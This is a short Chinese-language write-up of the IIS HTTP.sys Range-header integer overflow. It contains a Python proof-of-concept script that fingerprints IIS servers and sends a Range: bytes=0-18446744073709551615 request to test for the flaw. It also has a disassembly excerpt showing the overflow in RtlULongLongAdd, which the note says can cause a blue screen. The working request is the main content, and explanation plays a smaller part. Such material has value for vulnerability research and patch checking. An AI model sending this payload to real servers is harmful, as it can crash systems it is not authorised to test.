YLLEN

 现在最多造成蓝屏

POC

import socket

import random

ipAddr = "WebSite"

hexAllFfff = "18446744073709551615"

count=0

req1 = "GET / HTTP/1.0\r\n\r\n"

req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes="+str(count)+"-" + hexAllFfff + "\r\n\r\n"

print "[*] Audit Started"

client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

client_socket.connect((ipAddr, 80))

client_socket.send(req1)

boringResp = client_socket.recv(1024)

if "Microsoft" not in boringResp:

        print "[*] Not IIS"

        exit(0)

client_socket.close()

client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

client_socket.connect((ipAddr, 80))

client_socket.send(req)

goodResp = client_socket.recv(1024)

if "Requested Range Not Satisfiable" in goodResp:

        print "[!!] Looks VULN"

elif " The request has an invalid header name" in goodResp:

        print "[*] Looks Patched"

else:

        print "[*] Unexpected response, cannot discern patch status"

print goodResp

漏洞原理：

HTTP.sys 在处理内核缓存数据时，

8a8b2112 56         push esi
8a8b2113 6a00     push 0
8a8b2115 2bc7     sub eax,edi
8a8b2117 6a01     push 1
8a8b2119 1bca     sbb ecx,edx
8a8b211b 51         push ecx
8a8b211c 50         push eax
8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here

eax1 = eax -  edi

ecx1 = ecx - edx

RtlULongLongAdd  (eax1 , ecx1)

其中 eax1 与 ecx1 是 处理 HTTP 请求中

Range: bytes="+offsetlow+"-" + offsethigh+ "\r\n\r\n"

当 offsetlow = 0 , offsethigh = 0xFFFFFFFFFFFFFFFF

时 经过 RtlULongLongAdd 操作

0xFFFFFFFFFFFFFFFF + 0 + 1 = 0 造成整数溢出